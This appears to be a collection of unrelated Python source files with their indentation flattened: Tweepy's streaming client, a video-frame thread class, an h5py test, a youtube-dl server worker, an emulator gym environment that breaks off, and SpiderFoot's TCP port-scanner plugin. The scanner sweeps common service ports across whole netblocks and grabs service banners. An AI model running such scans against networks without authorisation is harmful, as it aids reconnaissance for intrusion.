"""Start the background camera thread if it isn't running yet."""
if VideoBase.thread is None:
VideoBase.last_access = time.time()
# start background frame thread
VideoBase.thread = threading.Thread(target=self._thread)
VideoBase.thread.start()
# wait until frames are available
while self.get_frame() is None:
time.sleep(0)
''' Get current frame from video stream '''
def get_frame(self):
"""Return the current camera frame."""
VideoBase.last_access = time.time()
# wait for a signal from the camera thread
VideoBase.event.wait()
VideoBase.event.clear()
return VideoBase.frame
''' Abstract interface that implemented by sub-class '''
@staticmethod
def frames():
'''Generator that returns frames from the camera.'''
raise RuntimeError('Must be implemented by subclasses.')
''' thread function to process video stream '''
@classmethod
def _thread(cls):
'''Launch background thread.'''
print('Starting videostream thread.')
frames_iterator = cls.frames()
for frame in frames_iterator:
VideoBase.frame = frame
VideoBase.event.set() # send signal to clients
time.sleep(0)
# if there hasn't been any clients asking for frames in
# the last 10 seconds then stop the thread
if time.time() - VideoBase.last_access > 10:
frames_iterator.close()
print('Stopping videostream thread due to inactivity.')
break
VideoBase.thread = None
|
streaming.py
|
# Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
# Appengine users: https://developers.google.com/appengine/docs/python/sockets/#making_httplib_use_sockets
from __future__ import absolute_import, print_function
import logging
import requests
from requests.exceptions import Timeout
from threading import Thread
from time import sleep
import six
import ssl
from tweepy.models import Status
from tweepy.api import API
from tweepy.error import TweepError
from tweepy.utils import import_simplejson
json = import_simplejson()
STREAM_VERSION = '1.1'
class StreamListener(object):
def __init__(self, api=None):
self.api = api or API()
def on_connect(self):
"""Called once connected to streaming server.
This will be invoked once a successful response
is received from the server. Allows the listener
to perform some work prior to entering the read loop.
"""
pass
def on_data(self, raw_data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data. Return False to stop stream and close connection.
"""
data = json.loads(raw_data)
if 'in_reply_to_status_id' in data:
status = Status.parse(self.api, data)
if self.on_status(status) is False:
return False
elif 'delete' in data:
delete = data['delete']['status']
if self.on_delete(delete['id'], delete['user_id']) is False:
return False
elif 'event' in data:
status = Status.parse(self.api, data)
if self.on_event(status) is False:
return False
elif 'direct_message' in data:
status = Status.parse(self.api, data)
if self.on_direct_message(status) is False:
return False
elif 'friends' in data:
if self.on_friends(data['friends']) is False:
return False
elif 'limit' in data:
if self.on_limit(data['limit']['track']) is False:
return False
elif 'disconnect' in data:
if self.on_disconnect(data['disconnect']) is False:
return False
elif 'warning' in data:
if self.on_warning(data['warning']) is False:
return False
else:
logging.error("Unknown message type: " + str(raw_data))
def keep_alive(self):
"""Called when a keep-alive arrived"""
return
def on_status(self, status):
"""Called when a new status arrives"""
return
def on_exception(self, exception):
"""Called when an unhandled exception occurs."""
return
def on_delete(self, status_id, user_id):
"""Called when a delete notice arrives for a status"""
return
def on_event(self, status):
"""Called when a new event arrives"""
return
def on_direct_message(self, status):
"""Called when a new direct message arrives"""
return
def on_friends(self, friends):
"""Called when a friends list arrives.
friends is a list that contains user_id
"""
return
def on_limit(self, track):
"""Called when a limitation notice arrives"""
return
def on_error(self, status_code):
"""Called when a non-200 status code is returned"""
return False
def on_timeout(self):
"""Called when stream connection times out"""
return
def on_disconnect(self, notice):
"""Called when twitter sends a disconnect notice
Disconnect codes are listed here:
https://dev.twitter.com/docs/streaming-apis/messages#Disconnect_messages_disconnect
"""
return
def on_warning(self, notice):
"""Called when a disconnection warning message arrives"""
return
class ReadBuffer(object):
"""Buffer data from the response in a smarter way than httplib/requests can.
Tweets are roughly in the 2-12kb range, averaging around 3kb.
Requests/urllib3/httplib/socket all use socket.read, which blocks
until enough data is returned. On some systems (eg google appengine), socket
reads are quite slow. To combat this latency we can read big chunks,
but the blocking part means we won't get results until enough tweets
have arrived. That may not be a big deal for high throughput systems.
For low throughput systems we don't want to sacrafice latency, so we
use small chunks so it can read the length and the tweet in 2 read calls.
"""
def __init__(self, stream, chunk_size):
self._stream = stream
self._buffer = ''
self._chunk_size = chunk_size
def read_len(self, length):
while not self._stream.closed:
if len(self._buffer) >= length:
return self._pop(length)
read_len = max(self._chunk_size, length - len(self._buffer))
self._buffer += self._stream.read(read_len)
def read_line(self, sep='\n'):
start = 0
while not self._stream.closed:
loc = self._buffer.find(sep, start)
if loc >= 0:
return self._pop(loc + len(sep))
else:
start = len(self._buffer)
self._buffer += self._stream.read(self._chunk_size)
def _pop(self, length):
r = self._buffer[:length]
self._buffer = self._buffer[length:]
return r
class Stream(object):
host = 'stream.twitter.com'
def __init__(self, auth, listener, **options):
self.auth = auth
self.listener = listener
self.running = False
self.timeout = options.get("timeout", 300.0)
self.retry_count = options.get("retry_count")
# values according to
# https://dev.twitter.com/docs/streaming-apis/connecting#Reconnecting
self.retry_time_start = options.get("retry_time", 5.0)
self.retry_420_start = options.get("retry_420", 60.0)
self.retry_time_cap = options.get("retry_time_cap", 320.0)
self.snooze_time_step = options.get("snooze_time", 0.25)
self.snooze_time_cap = options.get("snooze_time_cap", 16)
# The default socket.read size. Default to less than half the size of
# a tweet so that it reads tweets with the minimal latency of 2 reads
# per tweet. Values higher than ~1kb will increase latency by waiting
# for more data to arrive but may also increase throughput by doing
# fewer socket read calls.
self.chunk_size = options.get("chunk_size", 512)
self.verify = options.get("verify", True)
self.api = API()
self.headers = options.get("headers") or {}
self.new_session()
self.body = None
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
def new_session(self):
self.session = requests.Session()
self.session.headers = self.headers
self.session.params = None
def _run(self):
# Authenticate
url = "https://%s%s" % (self.host, self.url)
# Connect and process the stream
error_counter = 0
resp = None
exception = None
while self.running:
if self.retry_count is not None:
if error_counter > self.retry_count:
# quit if error count greater than retry count
break
try:
auth = self.auth.apply_auth()
resp = self.session.request('POST',
url,
data=self.body,
timeout=self.timeout,
stream=True,
auth=auth,
verify=self.verify)
if resp.status_code != 200:
if self.listener.on_error(resp.status_code) is False:
break
error_counter += 1
if resp.status_code == 420:
self.retry_time = max(self.retry_420_start,
self.retry_time)
sleep(self.retry_time)
self.retry_time = min(self.retry_time * 2,
self.retry_time_cap)
else:
error_counter = 0
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
self.listener.on_connect()
self._read_loop(resp)
except (Timeout, ssl.SSLError) as exc:
# This is still necessary, as a SSLError can actually be
# thrown when using Requests
# If it's not time out treat it like any other exception
if isinstance(exc, ssl.SSLError):
if not (exc.args and 'timed out' in str(exc.args[0])):
exception = exc
break
if self.listener.on_timeout() is False:
break
if self.running is False:
break
sleep(self.snooze_time)
self.snooze_time = min(self.snooze_time + self.snooze_time_step,
self.snooze_time_cap)
except Exception as exc:
exception = exc
# any other exception is fatal, so kill loop
break
# cleanup
self.running = False
if resp:
resp.close()
self.new_session()
if exception:
# call a handler first so that the exception can be logged.
self.listener.on_exception(exception)
raise exception
def _data(self, data):
if self.listener.on_data(data) is False:
self.running = False
def _read_loop(self, resp):
buf = ReadBuffer(resp.raw, self.chunk_size)
while self.running and not resp.raw.closed:
length = 0
while not resp.raw.closed:
line = buf.read_line().strip()
if not line:
self.listener.keep_alive() # keep-alive new lines are expected
elif line.isdigit():
length = int(line)
break
else:
raise TweepError('Expecting length, unexpected value found')
next_status_obj = buf.read_len(length)
if self.running:
self._data(next_status_obj)
# # Note: keep-alive newlines might be inserted before each length value.
# # read until we get a digit...
# c = b'\n'
# for c in resp.iter_content(decode_unicode=True):
# if c == b'\n':
# continue
# break
#
# delimited_string = c
#
# # read rest of delimiter length..
# d = b''
# for d in resp.iter_content(decode_unicode=True):
# if d != b'\n':
# delimited_string += d
# continue
# break
#
# # read the next twitter status object
# if delimited_string.decode('utf-8').strip().isdigit():
# status_id = int(delimited_string)
# next_status_obj = resp.raw.read(status_id)
# if self.running:
# self._data(next_status_obj.decode('utf-8'))
if resp.raw.closed:
self.on_closed(resp)
def _start(self, async):
self.running = True
if async:
self._thread = Thread(target=self._run)
self._thread.start()
else:
self._run()
def on_closed(self, resp):
""" Called when the response has been closed by Twitter """
pass
def userstream(self,
stall_warnings=False,
_with=None,
replies=None,
track=None,
locations=None,
async=False,
encoding='utf8'):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/user.json' % STREAM_VERSION
self.host = 'userstream.twitter.com'
if stall_warnings:
self.session.params['stall_warnings'] = stall_warnings
if _with:
self.session.params['with'] = _with
if replies:
self.session.params['replies'] = replies
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.session.params['locations'] = ','.join(['%.2f' % l for l in locations])
if track:
self.session.params['track'] = u','.join(track).encode(encoding)
self._start(async)
def firehose(self, count=None, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/firehose.json' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def retweet(self, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/retweet.json' % STREAM_VERSION
self._start(async)
def sample(self, async=False, languages=None):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/sample.json' % STREAM_VERSION
if languages:
self.session.params['language'] = ','.join(map(str, languages))
self._start(async)
def filter(self, follow=None, track=None, async=False, locations=None,
stall_warnings=False, languages=None, encoding='utf8', filter_level=None):
self.body = {}
self.session.headers['Content-type'] = "application/x-www-form-urlencoded"
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/filter.json' % STREAM_VERSION
if follow:
self.body['follow'] = u','.join(follow).encode(encoding)
if track:
self.body['track'] = u','.join(track).encode(encoding)
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.body['locations'] = u','.join(['%.4f' % l for l in locations])
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if languages:
self.body['language'] = u','.join(map(str, languages))
if filter_level:
self.body['filter_level'] = unicode(filter_level, encoding)
self.session.params = {'delimited': 'length'}
self.host = 'stream.twitter.com'
self._start(async)
def sitestream(self, follow, stall_warnings=False,
with_='user', replies=False, async=False):
self.body = {}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/site.json' % STREAM_VERSION
self.body['follow'] = u','.join(map(six.text_type, follow))
self.body['delimited'] = 'length'
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if with_:
self.body['with'] = with_
if replies:
self.body['replies'] = replies
self._start(async)
def disconnect(self):
if self.running is False:
return
self.running = False
|
sfp_portscan_tcp.py
|
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: sfp_portscan_tcp
# Purpose: SpiderFoot plug-in for performing a basic TCP port scan of IP
# addresses identified.
#
# Author: Steve Micallef <steve@binarypool.com>
#
# Created: 20/02/2013
# Copyright: (c) Steve Micallef 2013
# Licence: MIT
# -------------------------------------------------------------------------------
import random
import threading
import time
from netaddr import IPNetwork
from spiderfoot import SpiderFootEvent, SpiderFootPlugin
class sfp_portscan_tcp(SpiderFootPlugin):
meta = {
'name': "Port Scanner - TCP",
'summary': "Scans for commonly open TCP ports on Internet-facing systems.",
'flags': ["slow", "invasive"],
'useCases': ["Footprint", "Investigate"],
'categories': ["Crawling and Scanning"]
}
# Default options
opts = {
# Commonly used ports on external-facing systems
'ports': ['21', '22', '23', '25', '53', '79', '80', '81', '88', '110', '111',
'113', '119', '123', '137', '138', '139', '143', '161', '179',
'389', '443', '445', '465', '512', '513', '514', '515', '3306',
'5432', '1521', '2638', '1433', '3389', '5900', '5901', '5902',
'5903', '5631', '631', '636',
'990', '992', '993', '995', '1080', '8080', '8888', '9000'],
'timeout': 15,
'maxthreads': 10,
'randomize': True,
'netblockscan': True,
'netblockscanmax': 24
}
# Option descriptions
optdescs = {
'maxthreads': "Number of ports to try to open simultaneously (number of threads to spawn at once.)",
'ports': r"The TCP ports to scan. Prefix with an '@' to iterate through a file containing ports to try (one per line), e.g. @C:\ports.txt or @/home/bob/ports.txt. Or supply a URL to load the list from there.",
'timeout': "Seconds before giving up on a port.",
'randomize': "Randomize the order of ports scanned.",
'netblockscan': "Port scan all IPs within identified owned netblocks?",
'netblockscanmax': "Maximum netblock/subnet size to scan IPs within (CIDR value, 24 = /24, 16 = /16, etc.)"
}
results = None
portlist = list()
portResults = dict()
lock = None
errorState = False
def setup(self, sfc, userOpts=dict()):
self.sf = sfc
self.results = self.tempStorage()
self.__dataSource__ = "Target Network"
self.lock = threading.Lock()
for opt in list(userOpts.keys()):
self.opts[opt] = userOpts[opt]
portlist = list()
if self.opts['ports'][0].startswith("http://") or \
self.opts['ports'][0].startswith("https://") or \
self.opts['ports'][0].startswith("@"):
file_ports = self.sf.optValueToData(self.opts['ports'][0])
if file_ports:
portlist = file_ports.split("\n")
else:
self.error(f"Could not load ports from {self.opts['ports'][0]}")
else:
portlist = self.opts['ports']
# Convert to integers
for port in set(portlist):
try:
self.portlist.append(int(port))
except ValueError:
self.debug(f"Skipping invalid port '{port}' specified in port list")
if self.opts['randomize']:
random.SystemRandom().shuffle(self.portlist)
# What events is this module interested in for input
def watchedEvents(self):
return ['IP_ADDRESS', 'NETBLOCK_OWNER']
# What events this module produces
def producedEvents(self):
return ["TCP_PORT_OPEN", "TCP_PORT_OPEN_BANNER"]
def tryPort(self, ip, port):
peer = f"{ip}:{port}"
try:
sock = self.sf.safeSocket(ip, port, self.opts['timeout'])
with self.lock:
self.portResults[peer] = True
except Exception:
with self.lock:
self.portResults[peer] = False
return
# If the port was open, see what we can read
try:
with self.lock:
self.portResults[peer] = sock.recv(4096)
except Exception:
sock.close()
return
sock.close()
def tryPortWrapper(self, ip, portList):
self.portResults = dict()
running = True
i = 0
t = []
# Spawn threads for scanning
while i < len(portList):
port = portList[i]
self.info(f"Spawning thread to check port: {port} on {ip}")
t.append(threading.Thread(name=f"sfp_portscan_tcp_{port}", target=self.tryPort, args=(ip, port)))
t[i].start()
i += 1
# Block until all threads are finished
while running:
found = False
for rt in threading.enumerate():
if rt.name.startswith("sfp_portscan_tcp_"):
found = True
if not found:
running = False
time.sleep(0.25)
return self.portResults
# Generate TCP_PORT_OPEN_BANNER event
def sendEvent(self, resArray, srcEvent):
for cp in resArray:
if not resArray[cp]:
continue
self.info(f"TCP port {cp} found to be OPEN.")
evt = SpiderFootEvent("TCP_PORT_OPEN", cp, self.__name__, srcEvent)
self.notifyListeners(evt)
if resArray[cp] is not True:
banner = str(resArray[cp], 'utf-8', errors='replace')
bevt = SpiderFootEvent("TCP_PORT_OPEN_BANNER", banner, self.__name__, evt)
self.notifyListeners(bevt)
# Handle events sent to this module
def handleEvent(self, event):
eventName = event.eventType
srcModuleName = event.module
eventData = event.data
if self.errorState:
return
self.debug(f"Received event, {eventName}, from {srcModuleName}")
if not self.portlist:
self.error('No ports specified in port list')
self.errorState = True
return
scanIps = list()
if eventName == "NETBLOCK_OWNER":
if not self.opts['netblockscan']:
self.debug(f"Scanning of owned netblocks is disabled. Skipping netblock {eventData}.")
return
try:
net = IPNetwork(eventData)
except Exception as e:
self.error(f"Strange netblock identified, unable to parse: {eventData} ({e})")
return
if net.prefixlen < self.opts['netblockscanmax']:
self.debug(f"Skipping port scanning of owned net block {eventData}, too big.")
return
for ip in net:
ipaddr = str(ip)
if '255' in ipaddr.split("."):
continue
if ipaddr.split(".")[3] == '0':
continue
scanIps.append(ipaddr)
else:
scanIps.append(eventData)
for ipAddr in set(scanIps):
if ipAddr in self.results:
self.debug(f"Skipping {ipAddr} as already scanned.")
return
self.results[ipAddr] = True
self.info(f"Scanning {len(set(self.portlist))} ports on {ipAddr}")
i = 0
portArr = []
for port in self.portlist:
if self.checkForStop():
return
if i < self.opts['maxthreads']:
portArr.append(port)
else:
self.sendEvent(self.tryPortWrapper(ipAddr, portArr), event)
i = 0
portArr = [port]
i += 1
# Scan whatever is remaining
self.sendEvent(self.tryPortWrapper(ipAddr, portArr), event)
# End of sfp_portscan_tcp class
|
test_threads.py
|
# This file is part of h5py, a Python interface to the HDF5 library.
#
# http://www.h5py.org
#
# Copyright 2008-2013 Andrew Collette and contributors
#
# License: Standard 3-clause BSD; see "license.txt" for full license terms
# and contributor agreement.
"""
Tests the h5py.File object.
"""
from __future__ import absolute_import
import threading
import h5py
from .common import ut, TestCase
class TestErrorPrinting(TestCase):
"""
Verify the error printing is squashed in all threads.
"""
def test_printing(self):
""" No console messages should be shown from membership tests """
# Unfortunately we can't have this test assert anything, as
# HDF5 writes directly to stderr. But it will show up in the
# console output.
import threading
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
try:
doesnt_exist = newfile['doesnt_exist'].value
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
def test_attr_printing(self):
""" No console messages should be shown for non-existing attributes """
def test():
with h5py.File(self.mktemp(), 'w') as newfile:
newfile['newdata'] = [1,2,3]
try:
nonexistent_attr = newfile['newdata'].attrs['nonexistent_attr']
except KeyError:
pass
th = threading.Thread(target=test)
th.start()
th.join()
|
ydlhandler.py
|
import os
from queue import Queue
from threading import Thread
import subprocess
from collections import ChainMap
import io
import importlib
import youtube_dlc
import json
from time import sleep
import sys
from ydl_server.logdb import JobsDB, Job, Actions, JobType
from ydl_server import jobshandler
from ydl_server.config import app_defaults
queue = Queue()
thread = None
done = False
def start():
thread = Thread(target=worker)
thread.start()
def put(obj):
queue.put(obj)
def finish():
done = True
def worker():
while not done:
job = queue.get()
job.status = Job.RUNNING
jobshandler.put((Actions.SET_STATUS, (job.id, job.status)))
if job.type == JobType.YDL_DOWNLOAD:
output = io.StringIO()
stdout_thread = Thread(target=download_log_update,
args=(job, output))
stdout_thread.start()
try:
job.log = Job.clean_logs(download(job.url, {'format': job.format}, output, job.id))
job.status = Job.COMPLETED
except Exception as e:
job.status = Job.FAILED
job.log += str(e)
print("Exception during download task:\n" + str(e))
stdout_thread.join()
elif job.type == JobType.YDL_UPDATE:
rc, log = update()
job.log = Job.clean_logs(log)
job.status = Job.COMPLETED if rc == 0 else Job.FAILED
jobshandler.put((Actions.UPDATE, job))
queue.task_done()
def reload_youtube_dl():
for module in list(sys.modules.keys()):
if 'youtube' in module:
importlib.reload(sys.modules[module])
def update():
if os.environ.get('YDL_PYTHONPATH'):
command = ["pip", "install", "--no-cache-dir", "-t", os.environ.get('YDL_PYTHONPATH'), "--upgrade", "youtube-dlc"]
else:
command = ["pip", "install", "--no-cache-dir", "--upgrade", "youtube-dlc"]
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, err = proc.communicate()
if proc.returncode == 0:
reload_youtube_dl()
return proc.returncode, str(out.decode('utf-8'))
def get_ydl_options(request_options):
request_vars = {
'YDL_EXTRACT_AUDIO_FORMAT': None,
'YDL_RECODE_VIDEO_FORMAT': None,
}
requested_format = request_options.get('format', 'bestvideo')
if requested_format in ['aac', 'flac', 'mp3', 'm4a', 'opus', 'vorbis', 'wav']:
request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = requested_format
elif requested_format == 'bestaudio':
request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = 'best'
elif requested_format in ['mp4', 'flv', 'webm', 'ogg', 'mkv', 'avi']:
request_vars['YDL_RECODE_VIDEO_FORMAT'] = requested_format
ydl_vars = ChainMap(request_vars, os.environ, app_defaults)
postprocessors = []
if(ydl_vars['YDL_EXTRACT_AUDIO_FORMAT']):
postprocessors.append({
'key': 'FFmpegExtractAudio',
'preferredcodec': ydl_vars['YDL_EXTRACT_AUDIO_FORMAT'],
'preferredquality': ydl_vars['YDL_EXTRACT_AUDIO_QUALITY'],
})
if(ydl_vars['YDL_RECODE_VIDEO_FORMAT']):
postprocessors.append({
'key': 'FFmpegVideoConvertor',
'preferedformat': ydl_vars['YDL_RECODE_VIDEO_FORMAT'],
})
ydl_options = {
'format': ydl_vars['YDL_FORMAT'],
'postprocessors': postprocessors,
'outtmpl': ydl_vars['YDL_OUTPUT_TEMPLATE'],
'download_archive': ydl_vars['YDL_ARCHIVE_FILE'],
'cachedir': ydl_vars['YDL_CACHE_DIR']
}
ydl_options = {**ydl_vars['YDL_RAW_OPTIONS'], **ydl_options}
if ydl_vars['YDL_SUBTITLES_LANGUAGES']:
ydl_options['writesubtitles'] = True
if ydl_vars['YDL_SUBTITLES_LANGUAGES'] != 'all':
ydl_options['subtitleslangs'] = \
ydl_vars['YDL_SUBTITLES_LANGUAGES'].split(',')
else:
ydl_options['allsubtitles'] = True
return ydl_options
def download_log_update(job, stringio):
while job.status == Job.RUNNING:
job.log = Job.clean_logs(stringio.getvalue())
jobshandler.put((Actions.SET_LOG, (job.id, job.log)))
sleep(5)
def fetch_metadata(url):
stdout = io.StringIO()
stderr = io.StringIO()
info = None
with youtube_dlc.YoutubeDL({'extract_flat': 'in_playlist'}) as ydl:
ydl.params['extract_flat'] = 'in_playlist'
return ydl.extract_info(url, download=False)
def download(url, request_options, output, job_id):
with youtube_dlc.YoutubeDL(get_ydl_options(request_options)) as ydl:
ydl.params['extract_flat'] = 'in_playlist'
ydl_opts = ChainMap(os.environ, app_defaults)
info = ydl.extract_info(url, download=False)
if 'title' in info and info['title']:
jobshandler.put((Actions.SET_NAME, (job_id, info['title'])))
if '_type' in info and info['_type'] == 'playlist' \
and 'YDL_OUTPUT_TEMPLATE_PLAYLIST' in ydl_opts:
ydl.params['outtmpl'] = ydl_opts['YDL_OUTPUT_TEMPLATE_PLAYLIST']
ydl.params['extract_flat']= False
# Swap out sys.stdout as ydl's output so we can capture it
ydl._screen_file = output
ydl._err_file = ydl._screen_file
ydl.download([url])
return ydl._screen_file.getvalue()
def resume_pending():
db = JobsDB(readonly=False)
jobs = db.get_all()
not_endeds = [job for job in jobs if job['status'] == "Pending" or job['status'] == 'Running']
for pending in not_endeds:
if int(pending["type"]) == JobType.YDL_UPDATE:
jobshandler.put((Actions.SET_STATUS, (pending["id"], Job.FAILED)))
else:
job = Job(pending["name"], Job.PENDING, "Queue stopped",
int(pending["type"]), pending["format"], pending["url"])
job.id = pending["id"]
jobshandler.put((Actions.RESUME, job))
def join():
if thread is not None:
return thread.join()
def get_ydl_version():
return youtube_dlc.version.__version__
|
mupen64plus_env.py
|
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import abc
import array
import inspect
import itertools
import json
import os
import subprocess
import threading
import time
from termcolor import cprint
import yaml
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import numpy as np
import mss
###############################################
class ImageHelper:
def GetPixelColor(self, image_array, x, y):
base_pixel = image_array[y][x]
red = base_pixel[0]
green = base_pixel[1]
blue = base_pixel[2]
return (red, green, blue)
###############################################
### Variables & Constants ###
###############################################
config = yaml.safe_load(open(os.path.join(os.path.dirname(inspect.stack()[0][1]), "config.yml")))
MILLISECOND = 1.0 / 1000.0
IMAGE_HELPER = ImageHelper()
###############################################
class Mupen64PlusEnv(gym.Env):
__metaclass__ = abc.ABCMeta
metadata = {'render.modes': ['human']}
def __init__(self, rom_name):
self.viewer = None
self.reset_count = 0
self.step_count = 0
self.running = True
self.mss_grabber = None
self.episode_over = False
self.numpy_array = None
self.controller_server, self.controller_server_thread = self._start_controller_server()
self.xvfb_process, self.emulator_process = self._start_emulator(rom_name=rom_name)
self._navigate_menu()
self.observation_space = \
spaces.Box(low=0, high=255, shape=(config['SCR_H'], config['SCR_W'], config['SCR_D']))
self.action_space = spaces.MultiDiscrete([[-80, 80], # Joystick X-axis
[-80, 80], # Joystick Y-axis
[0, 1], # A Button
[0, 1], # B Button
[0, 1]]) # RB Button
def _step(self, action):
#cprint('Step %i: %s' % (self.step_count, action), 'green')
self._act(action)
obs = self._observe()
self.episode_over = self._evaluate_end_state()
reward = self._get_reward()
self.step_count += 1
return obs, reward, self.episode_over, {}
def _act(self, action, count=1):
for _ in itertools.repeat(None, count):
self.controller_server.send_controls(action)
def _wait(self, count=1, wait_for='Unknown'):
self._act(ControllerState.NO_OP, count=count)
def _press_button(self, button):
self._act(button) # Press
self._act(ControllerState.NO_OP) # and release
def _observe(self):
#cprint('Observe called!', 'yellow')
if config['USE_XVFB']:
offset_x = 0
offset_y = 0
else:
offset_x = config['OFFSET_X']
offset_y = config['OFFSET_Y']
image_array = \
np.array(self.mss_grabber.grab({"top": offset_y,
"left": offset_x,
"width": config['SCR_W'],
"height": config['SCR_H']}),
dtype=np.uint8)
# drop the alpha channel and flip red and blue channels (BGRA -> RGB)
self.numpy_array = \
np.flip(image_array[:, :, :3], 2)
return self.numpy_array
@abc.abstractmethod
def _navigate_menu(self):
return
@abc.abstractmethod
def _get_reward(self):
#cprint('Get Reward called!', 'yellow')
return 0
@abc.abstractmethod
def _evaluate_end_state(self):
#cprint('Evaluate End State called!', 'yellow')
return False
@abc.abstractmethod
def _reset(self):
cprint('Reset called!', 'yellow')
self.reset_count += 1
self.step_count = 0
return self._observe()
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
img = self.numpy_array
if mode == 'rgb_array':
return img
elif mode == 'human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(img)
def _close(self):
cprint('Close called!', 'yellow')
self.running = False
self._kill_emulator()
self._stop_controller_server()
def _start_controller_server(self):
server = ControllerHTTPServer(('', config['PORT_NUMBER']),
config['ACTION_TIMEOUT'])
server_thread = threading.Thread(target=server.serve_forever, args=())
server_thread.daemon = True
server_thread.start()
print('ControllerHTTPServer started on port ', config['PORT_NUMBER'])
return server, server_thread
def _stop_controller_server(self):
#cprint('Stop Controller Server called!', 'yellow')
if hasattr(self, 'controller_server'):
self.controller_server.shutdown()
def _start_emulator(self,
rom_name,
res_w=config['SCR_W'],
res_h=config['SCR_H'],
res_d=config['SCR_D'],
input_driver_path=config['INPUT_DRIVER_PATH']):
rom_path = os.path.abspath(
os.path.join(os.path.dirname(inspect.stack()[0][1]),
'../ROMs',
rom_name))
if not os.path.isfile(rom_path):
msg = "ROM not found: " + rom_path
cprint(msg, 'red')
raise Exception(msg)
input_driver_path = os.path.abspath(os.path.expanduser(input_driver_path))
if not os.path.isfile(input_driver_path):
msg = "Input driver not found: " + input_driver_path
cprint(msg, 'red')
raise Exception(msg)
cmd = [config['MUPEN_CMD'],
"--resolution",
"%ix%i" % (res_w, res_h),
"--audio", "dummy",
"--input",
input_driver_path,
rom_path]
initial_disp = os.environ["DISPLAY"]
cprint('Initially on DISPLAY %s' % initial_disp, 'red')
xvfb_proc = None
if config['USE_XVFB']:
display_num = -1
success = False
# If we couldn't find an open display number after 15 attempts, give up
while not success and display_num <= 15:
display_num += 1
xvfb_cmd = [config['XVFB_CMD'],
":" + str(display_num),
"-screen",
"0",
"%ix%ix%i" % (res_w, res_h, res_d * 8),
"-fbdir",
config['TMP_DIR']]
cprint('Starting xvfb with command: %s' % xvfb_cmd, 'yellow')
xvfb_proc = subprocess.Popen(xvfb_cmd, shell=False, stderr=subprocess.STDOUT)
time.sleep(2) # Give xvfb a couple seconds to start up
# Poll the process to see if it exited early
# (most likely due to a server already active on the display_num)
if xvfb_proc.poll() is None:
success = True
print('')
if not success:
msg = "Failed to initialize Xvfb!"
cprint(msg, 'red')
raise Exception(msg)
os.environ["DISPLAY"] = ":" + str(display_num)
cprint('Using DISPLAY %s' % os.environ["DISPLAY"], 'blue')
cprint('Changed to DISPLAY %s' % os.environ["DISPLAY"], 'red')
cmd = [config['VGLRUN_CMD']] + cmd
cprint('Starting emulator with comand: %s' % cmd, 'yellow')
emulator_process = subprocess.Popen(cmd,
env=os.environ.copy(),
shell=False,
stderr=subprocess.STDOUT)
# TODO: Test and cleanup:
# May need to initialize this after the DISPLAY env var has been set
# so it attaches to the correct X display; otherwise screenshots may
# come from the wrong place. This used to be true when we were using
# wxPython for screenshots. Untested after switching to mss.
cprint('Calling mss.mss() with DISPLAY %s' % os.environ["DISPLAY"], 'red')
self.mss_grabber = mss.mss()
time.sleep(2) # Give mss a couple seconds to initialize; also may not be necessary
# Restore the DISPLAY env var
os.environ["DISPLAY"] = initial_disp
cprint('Changed back to DISPLAY %s' % os.environ["DISPLAY"], 'red')
emu_mon = EmulatorMonitor()
monitor_thread = threading.Thread(target=emu_mon.monitor_emulator,
args=[emulator_process])
monitor_thread.daemon = True
monitor_thread.start()
return xvfb_proc, emulator_process
def _kill_emulator(self):
#cprint('Kill Emulator called!', 'yellow')
try:
self._act(ControllerState.NO_OP)
if self.emulator_process is not None:
self.emulator_process.kill()
if self.xvfb_process is not None:
self.xvfb_process.terminate()
except AttributeError:
pass # We may be shut down during intialization before these attributes have been set
###############################################
class EmulatorMonitor:
def monitor_emulator(self, emulator):
emu_return = emulator.poll()
while emu_return is None:
time.sleep(2)
emu_return = emulator.poll()
# TODO: this means our environment died... need to die too
print('Emulator closed with code: ' + str(emu_return))
###############################################
class ControllerState(object):
# Controls
NO_OP = [0, 0, 0, 0, 0]
A_BUTTON = [0, 0, 1, 0, 0]
B_BUTTON = [0, 0, 0, 1, 0]
RB_BUTTON = [0, 0, 0, 0, 1]
JOYSTICK_UP = [0, 80, 0, 0, 0]
JOYSTICK_DOWN = [0, -80, 0, 0, 0]
JOYSTICK_LEFT = [-80, 0, 0, 0, 0]
JOYSTICK_RIGHT = [80, 0, 0, 0, 0]
def __init__(self, controls=NO_OP, start_button=0):
self.START_BUTTON = start_button
self.X_AXIS = controls[0]
self.Y_AXIS = controls[1]
self.A_BUTTON = controls[2]
self.B_BUTTON = controls[3]
self.R_TRIG = controls[4]
self.L_TRIG = 0
self.Z_TRIG = 0
def to_json(self):
return json.dumps(self.__dict__)
###############################################
class ControllerHTTPServer(HTTPServer, object):
def __init__(self, server_address, control_timeout):
self.control_timeout = control_timeout
